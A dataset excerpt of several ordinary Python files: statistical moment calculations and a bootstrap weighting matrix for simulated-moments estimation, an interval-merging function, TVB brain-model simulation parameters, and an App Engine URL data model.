-1, -1, -1, -1],\n \"upper\": [3, 2.5, 0.7, 1.5, 0.7, 1.5, 2.5, -20, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n }\n df = pd.DataFrame(data, columns=[\"category\", \"name\", \"comment\", \"lower\", \"upper\"])\n df.set_index([\"category\", \"name\"], inplace=True)\n if return_toyestimates == True:\n df['value'] = [1.5,\n 1.823,\n 0.035,\n 0.085,\n 0.035,\n 0.085,\n 0.5,\n -25,\n 0,\n -0.1,\n -0.2,\n -0.2,\n -0.2,\n -0.2,\n -0.3,\n -0.3,\n -0.4]\n else:\n df[\"value\"] = (df[\"upper\"] + df[\"lower\"]) / 2\n for i in range(8, 17):\n df.iloc[i, 3] = 0\n if return_descriptives == True:\n df = df[[\"value\", \"comment\", \"lower\", \"upper\"]]\n else:\n df = df[[\"value\", \"lower\", \"upper\"]]\n return df\n\n\ndef moments_description():\n \"\"\"Describes Moments.\"\"\"\n data = {\n \"name\": [\n \"effort_std\",\n \"autocorrelation_l1\",\n \"autocorrelation_l2\",\n \"round_change_std\",\n \"period_average\",\n \"cond_corr_e2_prize\",\n \"cond_corr_e2_e1\",\n \"cond_corr_e2_e1timesprize\",\n \"j_perc_cond_corr_e2_prize\",\n \"j_perc_cond_corr_e2_e1\",\n \"j_perc_cond_corr_e2_e1timesprize\",\n \"low_effort_low_prize\",\n \"low_effort_high_prize\",\n \"high_effort_low_prize\",\n \"high_effort_high_prize\",\n \"low_effort_prop\",\n \"high_effort_prop\",\n ],\n \"comment\": [\n \"standard deviation of effort\",\n \"autocorrelation with lag 1\",\n \"autocorrelation with lag 2\",\n \"standard deviation of round-round change of effort\",\n \"average effort in period i\",\n \"correlation of e2 and prize, conditional on control effects\",\n \"correlation of e2 and e1, conditional on control effects\",\n \"correlation of e2 and e1 * prize, conditional on control effects\",\n \"jth percentile of cond. correlation e1 and prize of specific effects\",\n \"jth percentile of cond. correlation e1 and e2 of specific effects\",\n \"jth percentile of cond. 
correlation e2 and e1 * prize of specific effects\",\n \"effort conditional on low e1 and low prizes\",\n \"effort conditional on low e1 and high prizes\",\n \"effort conditional on high e1 and low prizes\",\n \"effort conditional on high e1 and high prizes\",\n \"probability of low effort\",\n \"probability of high effort\"\n ],\n }\n\n df = pd.DataFrame(data, columns=[\"name\", \"comment\"])\n df.set_index([\"name\"], inplace=True)\n return df\n\n\ndef replace_nans(df):\n \"\"\"Replace missing values in data.\"\"\"\n return df.fillna(0)\n\n\ndef effort_std(df):\n \"\"\"Standard deviation of the effort.\"\"\"\n return df[\"e2\"].std()\n\n\ndef df_autocorr(df, lag=1, axis=0):\n \"\"\"Compute full-sample column-wise autocorrelation for a DataFrame.\"\"\"\n return df.apply(lambda col: col.autocorr(lag), axis=axis)\n\n\ndef calc_autocorrelation_lag1(df):\n \"\"\"Compute average autocorrelation with specified lag.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n return corr_rounds.apply(lambda col: col.autocorr(1), axis=0).mean()\n\n\ndef pooled_autocorr_lag1(df):\n \"\"\"Compute the pooled autocorrelation with lag 1.\"\"\"\n ds = df.query(\"period > 1\")[\"e2\"]\n ds.reset_index(drop=True, inplace=True)\n ds_lag = df.query(\"period < 10\")[\"e2\"]\n ds_lag.reset_index(drop=True, inplace=True)\n return ds.corr(ds_lag)\n\n\ndef pooled_autocorr_lag2(df):\n \"\"\"Compute the pooled autocorrelation with lag 2.\"\"\"\n ds = df.query(\"period > 2\")[\"e2\"]\n ds.reset_index(drop=True, inplace=True)\n ds_lag = df.query(\"period < 9\")[\"e2\"]\n ds_lag.reset_index(drop=True, inplace=True)\n return ds.corr(ds_lag)\n\n\ndef calc_autocorrelation_lag2(df):\n \"\"\"Compute average autocorrelation with specified lag.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n return corr_rounds.apply(lambda col: col.autocorr(2), axis=0).mean()\n\n\ndef round_change_std(df):\n \"\"\"Compute standard deviation of round to round change.\"\"\"\n corr_rounds = df.reset_index(inplace=False)\n corr_rounds = corr_rounds.pivot(index=\"period\", columns=\"subject\")[\"e2\"]\n round_changes = list()\n for sub in corr_rounds.columns:\n for i in corr_rounds.index:\n if i < 10:\n round_changes.append(corr_rounds[sub][i + 1] - corr_rounds[sub][i])\n else:\n break\n rc = pd.Series(round_changes)\n return rc.std()\n\n\ndef period1_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {1}\")[\"e2\"].mean()\n\n\ndef period2_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {2}\")[\"e2\"].mean()\n\n\ndef period3_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {3}\")[\"e2\"].mean()\n\n\ndef period4_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {4}\")[\"e2\"].mean()\n\n\ndef period5_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {5}\")[\"e2\"].mean()\n\n\ndef period6_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {6}\")[\"e2\"].mean()\n\n\ndef period7_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {7}\")[\"e2\"].mean()\n\n\ndef period8_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {8}\")[\"e2\"].mean()\n\n\ndef period9_average(df):\n \"\"\"Compute 
period average effort.\"\"\"\n return df.query(f\"period == {9}\")[\"e2\"].mean()\n\n\ndef period10_average(df):\n \"\"\"Compute period average effort.\"\"\"\n return df.query(f\"period == {10}\")[\"e2\"].mean()\n\n\ndef cond_corr_e2_prize(df):\n \"\"\"Correlation of e2 and the prize after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"prize_resid\"])\n for label in [\"e2\", \"prize\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~e1+e1timesprize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"prize_resid\"])\n\n\ndef cond_corr_e2_e1(df):\n \"\"\"Correlation of e2 and the e1 after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1_resid\"])\n for label in [\"e2\", \"e1\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~prize+e1timesprize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"e1_resid\"])\n\n\ndef cond_corr_e2_e1timesprize(df):\n \"\"\"Correlation of e2 and the interaction of e1 and prize after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1timesprize_resid\"])\n for label in [\"e2\", \"e1timesprize\"]:\n column, formula = (\n f\"{label}_resid\",\n f\"{label}~e1+prize+tt2+tt3+tt4+tt5+tt6+tt7+tt8+tt9+tt10+EntityEffects\",\n )\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n return df_resid[\"e2_resid\"].corr(df_resid[\"e1timesprize_resid\"])\n\n\ndef perc17_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.5, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = 
pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_prize(df):\n \"\"\"J percentile of the correlation of e2 and the prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n p_resid = get_resid(df, i, \"prize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(p_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef perc17_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.50, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_e1(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1_resid = get_resid(df, i, \"e1\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef perc17_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return 
ds.quantile(0.17, interpolation=\"lower\")[0]\n\n\ndef perc33_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.33, interpolation=\"lower\")[0]\n\n\ndef perc50_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.5, interpolation=\"lower\")[0]\n\n\ndef perc66_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.66, interpolation=\"lower\")[0]\n\n\ndef perc83_cond_corr_e2_e1timesprize(df):\n \"\"\"J percentile of the correlation of e2 and the e1 * prize after partialing out other effects.\"\"\"\n corrs = list()\n for i in df.index.get_level_values('subject').unique():\n e1timesprize_resid = get_resid(df, i, \"e1timesprize\")\n e2_resid = get_resid(df, i, \"e2\")\n corrs.append(e2_resid.corr(e1timesprize_resid))\n ds = pd.DataFrame(corrs, columns=[\"correlation\"])\n ds.sort_values(by=\"correlation\", inplace=True)\n return ds.quantile(0.83, interpolation=\"lower\")[0]\n\n\ndef low_effort_low_prize(df):\n return df.query(\"e1 <= 23 & prize <= 1.33\")[\"e2\"].mean()\n\n\ndef low_effort_high_prize(df):\n return df.query(\"e1 <= 23 & prize >= 2.55\")[\"e2\"].mean()\n\n\ndef high_effort_low_prize(df):\n return df.query(\"e1 >= 28 & prize <= 1.33\")[\"e2\"].mean()\n\n\ndef high_effort_high_prize(df):\n return df.query(\"e1 >= 28 & prize >= 2.55\")[\"e2\"].mean()\n\n\ndef low_effort_prop(df):\n return df.query(\"e2 < 15\")[\"e2\"].count() / df[\"e2\"].count()\n\n\ndef high_effort_prop(df):\n return df.query(\"e2 > 35\")[\"e2\"].count() / df[\"e2\"].count()\n\n\ndef old_percentile_correlation(df):\n \"\"\"J percentile of the correlation of e2 and e1 after partialing out other effects.\"\"\"\n df_resid = pd.DataFrame(columns=[\"e2_resid\", \"e1_resid\"], index=df.index)\n for label in [\"e2\", \"e1\"]:\n column, formula = f\"{label}_resid\", f\"{label}~prize+e1timesprize+TimeEffects\"\n df_resid.loc[:, column] = PanelOLS.from_formula(formula, data=df).fit().resids\n dfs = dict()\n for sub in df_resid.index.get_level_values('subject').unique():\n dfs[f\"{sub}\"] = df_resid.query(f\"subject == {sub}\")\n cond_corr = list()\n for key in dfs:\n cond_corr.append(dfs[key][\"e2_resid\"].corr(dfs[key][\"e1_resid\"]))\n return np.percentile(cond_corr, 66)\n\n\ncalc_moments = {\n \"effort_std\": effort_std,\n \"corr_round_lag1\": 
pooled_autocorr_lag1,\n \"corr_round_lag2\": pooled_autocorr_lag2,\n \"round_change_std\": round_change_std,\n \"mean_period_1\": period1_average,\n \"mean_period_2\": period2_average,\n \"mean_period_3\": period3_average,\n \"mean_period_4\": period4_average,\n \"mean_period_5\": period5_average,\n \"mean_period_6\": period6_average,\n \"mean_period_7\": period7_average,\n \"mean_period_8\": period8_average,\n \"mean_period_9\": period9_average,\n \"mean_period_10\": period10_average,\n \"cond_corr_e2_prize\": cond_corr_e2_prize,\n \"cond_corr_e2_e1\": cond_corr_e2_e1,\n \"cond_corr_e2_e1timesprize\": cond_corr_e2_e1timesprize,\n \"perc17_cond_corr_e2_prize\": perc17_cond_corr_e2_prize,\n \"perc33_cond_corr_e2_prize\": perc33_cond_corr_e2_prize,\n \"perc50_cond_corr_e2_prize\": perc50_cond_corr_e2_prize,\n \"perc66_cond_corr_e2_prize\": perc66_cond_corr_e2_prize,\n \"perc83_cond_corr_e2_prize\": perc83_cond_corr_e2_prize,\n \"perc17_cond_corr_e2_e1\": perc17_cond_corr_e2_e1,\n \"perc33_cond_corr_e2_e1\": perc33_cond_corr_e2_e1,\n \"perc50_cond_corr_e2_e1\": perc50_cond_corr_e2_e1,\n \"perc66_cond_corr_e2_e1\": perc66_cond_corr_e2_e1,\n \"perc83_cond_corr_e2_e1\": perc83_cond_corr_e2_e1,\n \"perc17_cond_corr_e2_e1timesprize\": perc17_cond_corr_e2_e1timesprize,\n \"perc33_cond_corr_e2_e1timesprize\": perc33_cond_corr_e2_e1timesprize,\n \"perc50_cond_corr_e2_e1timesprize\": perc50_cond_corr_e2_e1timesprize,\n \"perc66_cond_corr_e2_e1timesprize\": perc66_cond_corr_e2_e1timesprize,\n \"perc83_cond_corr_e2_e1timesprize\": perc83_cond_corr_e2_e1timesprize,\n \"low_effort_low_prize\": low_effort_low_prize,\n \"low_effort_high_prize\": low_effort_high_prize,\n \"high_effort_low_prize\": high_effort_low_prize,\n \"high_effort_high_prize\": high_effort_high_prize,\n \"low_effort_prop\": low_effort_prop,\n \"high_effort_prop\": high_effort_prop,\n}\n\n\ndef observed_moments(df):\n \"\"\"Compute the observed moments.\"\"\"\n observed_moments = {\n \"effort_std\": calc_moments[\"effort_std\"](df),\n \"corr_round_lag1\": calc_moments[\"corr_round_lag1\"](df),\n \"corr_round_lag2\": calc_moments[\"corr_round_lag2\"](df),\n \"round_change_std\": calc_moments[\"round_change_std\"](df),\n \"mean_period_1\": calc_moments[\"mean_period_1\"](df),\n \"mean_period_2\": calc_moments[\"mean_period_2\"](df),\n \"mean_period_3\": calc_moments[\"mean_period_3\"](df),\n \"mean_period_4\": calc_moments[\"mean_period_4\"](df),\n \"mean_period_5\": calc_moments[\"mean_period_5\"](df),\n \"mean_period_6\": calc_moments[\"mean_period_6\"](df),\n \"mean_period_7\": calc_moments[\"mean_period_7\"](df),\n \"mean_period_8\": calc_moments[\"mean_period_8\"](df),\n \"mean_period_9\": calc_moments[\"mean_period_9\"](df),\n \"mean_period_10\": calc_moments[\"mean_period_10\"](df),\n \"cond_corr_e2_prize\": calc_moments[\"cond_corr_e2_prize\"](df),\n \"cond_corr_e2_e1\": calc_moments[\"cond_corr_e2_e1\"](df),\n \"cond_corr_e2_e1timesprize\": calc_moments[\"cond_corr_e2_e1timesprize\"](df),\n \"perc17_cond_corr_e2_prize\": calc_moments[\"perc17_cond_corr_e2_prize\"](df),\n \"perc33_cond_corr_e2_prize\": calc_moments[\"perc33_cond_corr_e2_prize\"](df),\n \"perc50_cond_corr_e2_prize\": calc_moments[\"perc50_cond_corr_e2_prize\"](df),\n \"perc66_cond_corr_e2_prize\": calc_moments[\"perc66_cond_corr_e2_prize\"](df),\n \"perc83_cond_corr_e2_prize\": calc_moments[\"perc83_cond_corr_e2_prize\"](df),\n \"perc17_cond_corr_e2_e1\": calc_moments[\"perc17_cond_corr_e2_e1\"](df),\n \"perc33_cond_corr_e2_e1\": 
calc_moments[\"perc33_cond_corr_e2_e1\"](df),\n \"perc50_cond_corr_e2_e1\": calc_moments[\"perc50_cond_corr_e2_e1\"](df),\n \"perc66_cond_corr_e2_e1\": calc_moments[\"perc66_cond_corr_e2_e1\"](df),\n \"perc83_cond_corr_e2_e1\": calc_moments[\"perc83_cond_corr_e2_e1\"](df),\n \"perc17_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc17_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc33_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc33_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc50_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc50_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc66_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc66_cond_corr_e2_e1timesprize\"\n ](df),\n \"perc83_cond_corr_e2_e1timesprize\": calc_moments[\n \"perc83_cond_corr_e2_e1timesprize\"\n ](df),\n \"low_effort_low_prize\": calc_moments[\"low_effort_low_prize\"](df),\n \"low_effort_high_prize\": calc_moments[\"low_effort_high_prize\"](df),\n \"high_effort_low_prize\": calc_moments[\"high_effort_low_prize\"](df),\n \"high_effort_high_prize\": calc_moments[\"high_effort_high_prize\"](df),\n \"low_effort_prop\": calc_moments[\"low_effort_prop\"](df),\n \"high_effort_prop\": calc_moments[\"high_effort_prop\"](df),\n }\n return observed_moments\n\n\n\n\ndef get_weighting_matrix(\n data,\n empirical_moments,\n calc_moments,\n n_bootstrap_samples,\n n_observations_per_sample,\n replace_missing_variances=None,\n):\n \"\"\" Computes a diagonal weighting matrix for estimation with msm. Weights are the\n inverse bootstrap variances of the observed sample moments.\"\"\"\n # Seed for reproducibility.\n np.random.seed(47828324)\n flat_empirical_moments = pd.Series(empirical_moments)\n index_base = data.index.get_level_values(\"subject\").unique()\n calc_moments = dict_to_list(calc_moments)\n # Create bootstrapped moments.\n moments_sample = list()\n for _ in range(n_bootstrap_samples):\n ids_boot = np.random.choice(\n index_base, n_observations_per_sample, replace=True\n )\n moments_boot = [func(data.loc[ids_boot]) for func in calc_moments]\n flat_moments_boot = pd.Series(moments_boot, index=flat_empirical_moments.index)\n moments_sample.append(flat_moments_boot)\n # Compute variance for each moment and construct diagonal weighting matrix.\n moments_var = np.array(moments_sample).var(axis=0)\n # The variance of missing moments is nan. 
Unless a replacement variance is\n # specified, their inverse variance will be set to 0.\n if replace_missing_variances is None:\n diagonal = moments_var ** (-1)\n diagonal = np.nan_to_num(diagonal, nan=0)\n weighting_matrix = np.diag(diagonal)\n else:\n moments_var = np.nan_to_num(moments_var, nan=replace_missing_variances)\n diagonal = moments_var ** (-1)\n weighting_matrix = np.diag(diagonal)\n # Checks weighting matrix.\n if np.isnan(weighting_matrix).any() or np.isinf(weighting_matrix).any():\n raise ValueError(\"Weighting matrix contains NaNs or infinite values.\")\n return weighting_matrix\n","sub_path":"auxiliary/msm.py","file_name":"msm.py","file_ext":"py","file_size_in_byte":26155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"633947900","text":"# @Andreas Schwarzkopf (schwarzkopf.and@gmail.com)\r\n\r\n# standard library\r\n# using List to handle duplicates and order of the intervals and to define input/output of function\r\nfrom typing import List\r\n\r\n# example input [[25,30],[2,19],[14,23],[4,8]]\r\n\r\n# Expected type for input and output are a List of Lists of Integers\r\n# Assumption: Since this module is only used for this coding task and not with pandas etc., integers will not cause memory overflow\r\ndef mergeIntervals(intervals: List[List[int]]) -> List[List[int]]:\r\n mergedIntervals = []\r\n\r\n # Assumption: raise TypeError if intervals is not a List\r\n if not isinstance(intervals, List):\r\n raise TypeError\r\n\r\n # Assumption: return empty list if no interval is given\r\n if not intervals:\r\n return []\r\n\r\n # sort intervals by the first key; source: https://stackoverflow.com/questions/21068315/python-sort-first-element-of-list\r\n intervals.sort(key=lambda x: x[0])\r\n\r\n for interval in intervals:\r\n # add interval to mergedIntervals if interval does not overlap with previous \r\n # or mergedIntervals is empty e.g. 
for the first interval\r\n if not mergedIntervals or mergedIntervals[-1][1] < interval[0]:\r\n mergedIntervals.append(interval)\r\n else:\r\n # in the other case there is overlap so merge previous interval with current one\r\n # https://www.programiz.com/python-programming/methods/built-in/max\r\n mergedIntervals[-1][1] = max(mergedIntervals[-1][1], interval[1])\r\n\r\n return mergedIntervals","sub_path":"merge/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378731895","text":"parameter_simulation={\n 'path_result':'./simulation_default',\n 'seed':10, # the seed for the random generator\n 'save_time': 10000.0, # the time of simulation in each file\n}\n\nparameter_model ={\n #order of the model\n 'order':2,\n #parameter of the model\n 'g_L':10.0,\n 'E_L_e':-67.0,\n 'E_L_i':-65.0,\n 'C_m':200.0,\n 'b_e':10.0,\n 'a_e':0.0,\n 'b_i':0.0,\n 'a_i':0.0,\n 'tau_w_e':500.0,\n 'tau_w_i':1.0,\n 'E_e':0.0,\n 'E_i':-80.0,\n 'Q_e':1.0,\n 'Q_i':6.5,\n 'tau_e':5.0,\n 'tau_i':5.0,\n 'N_tot':10000,\n 'p_connect_e':0.10,\n 'p_connect_i':0.095,# True value : 0.05,\n 'g':0.2,\n 'T':20.0,\n 'P_e':[-0.05514735, 0.00444736, 0.00079013, 0.01183319, 0.00145571, 0.00155584, -0.00679113, 0.00091574, -0.00475571, 0.00332159],\n 'P_i':[-0.05637474, 0.005188, -0.00342982, 0.01282597, -0.00142761, -0.00201966, -0.02266407, 0.00330289, 0.00486843, -0.00908176],\n 'external_input_ex_ex':0.000,\n 'external_input_ex_in':0.000,\n 'external_input_in_ex':0.000,\n 'external_input_in_in':0.000,\n 'K_ext_e':400,\n 'K_ext_i':0,\n #Initial condition :\n 'initial_condition':{\n \"E\": [0.001, 0.0001],\"I\": [0.001, 0.0001],\"C_ee\": [0.0,0.0],\"C_ei\": [0.0,0.0],\"C_ii\": [0.0,0.0],\"W_e\": [0.0, 0.0],\"W_i\": [0.0,0.0]}\n}\n\nparameter_connection_between_region={\n ## CONNECTIVITY\n # connectivity by default\n 'default':False,\n #from file (repertory with following files : tract_lengths.npy and weights.npy)\n 'from_file':False,\n 'from_h5':True,\n 'path':'/home/kusch/Documents/project/Zerlaut/YAdEX_TVB/data/hcp-001.zip', #repertory of the files\n # File description\n 'number_of_regions':0, # number of region\n # lenghts of tract between region : dimension => (number_of_regions, number_of_regions)\n 'tract_lengths':[],\n # weight along the tract : dimension => (number_of_regions, number_of_regions)\n 'weights':[],\n # speed of along long range connection\n 'speed':4.0,\n 'normalised':True\n}\n\nparameter_coupling={\n ##COUPLING\n 'type':'Linear', # choice : Linear, Scaling, HyperbolicTangent, Sigmoidal, SigmoidalJansenRit, PreSigmoidal, Difference, Kuramoto\n 'parameter':{'a':5.0e-1,\n 'b':0.0}\n}\n\n# parameter_integrator={\n# ## INTEGRATOR\n# 'type':'RungeKutta4thOrderDeterministic', # choice : Heun, Euler\n# 'dt': 0.5\n# }\n\nparameter_integrator={\n ## INTEGRATOR\n 'type':'Heun', # choice : Heun, Euler\n 'stochastic':True,\n 'noise_type': 'Ornstein_Ulhenbeck_process', # choice : Additive,Multiplicative,\n 'noise_parameter':{\n 'mu':[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], # in KHz, TAedit: decreased value from 1.0e-10\n 'nsig':[0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], # in KHz, TAedit: decreased value from 1.0e-10\n 'tau_OU':0.1,\n 'ntau':0.0,\n 'weight':[1.e-2]\n },\n 'dt': 0.5 # in ms\n}\n\nparameter_monitor= {\n 'Raw':True,\n 'TemporalAverage':True,\n 'parameter_TemporalAverage':{\n 'variables_of_interest':[0,1,2,3,4,5,6],\n 'period':parameter_integrator['dt']*10.0\n },\n 'Bold':False,\n 'parameter_Bold':{\n 
'variables_of_interest':[0],\n 'period':parameter_integrator['dt']*2000.0\n }\n # More monitor can be added\n}","sub_path":"tvb_model/parameter_new/parameter_New_1.py","file_name":"parameter_New_1.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442047591","text":"from google.appengine.ext import ndb\nfrom urlparse import urlparse\n\nclass Url(ndb.Model):\n url = ndb.StringProperty()\n title = ndb.StringProperty()\n \n # Valid url: >=1\n valid = ndb.IntegerProperty(default=1)\n status = ndb.StringProperty()\n last_check = ndb.DateTimeProperty(auto_now_add=True)\n\n # FullTextSearch related stuff\n document_date = ndb.DateTimeProperty()\n \n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def parse(self):\n return urlparse(self.url)\n \n def loc_title(self):\n loc=urlparse(self.url).scheme+'//'+urlparse(self.url).netloc\n if self.title:\n return loc+' - '+self.title\n else:\n new_title=''.join(self.url.split('/')[-1:])\n if len(new_title)>40:\n return loc+' - '+new_title[:20]+'...'+new_title[len(new_title)-10:]\n else:\n return loc+' - '+new_title\n \n def short(self):\n if self.title:\n return self.title\n else:\n new_title=''.join(self.url.split('/')[-1:])\n if len(new_title)>40:\n return 